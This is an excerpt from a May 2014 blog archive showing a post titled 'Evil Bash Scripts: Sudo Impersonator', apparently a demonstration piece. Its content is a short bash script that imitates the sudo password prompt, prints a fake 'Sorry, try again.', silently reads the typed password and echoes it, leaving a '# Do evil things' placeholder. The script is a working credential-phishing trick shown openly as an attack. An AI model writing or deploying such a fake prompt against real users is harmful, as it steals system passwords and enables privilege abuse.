Posts from May 2014
-
Evil Bash Scripts: Sudo Impersonator
[runassudo@NEXUS tmp]$ cat awesomeprogram
… »
#!/bin/bash
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root"
else
echo "Sorry, try again."
echo -n "[sudo] password for $SUDO_USER: "
read -s tmp
echo ""
echo "PASSWORD IS $tmp"
# Do evil things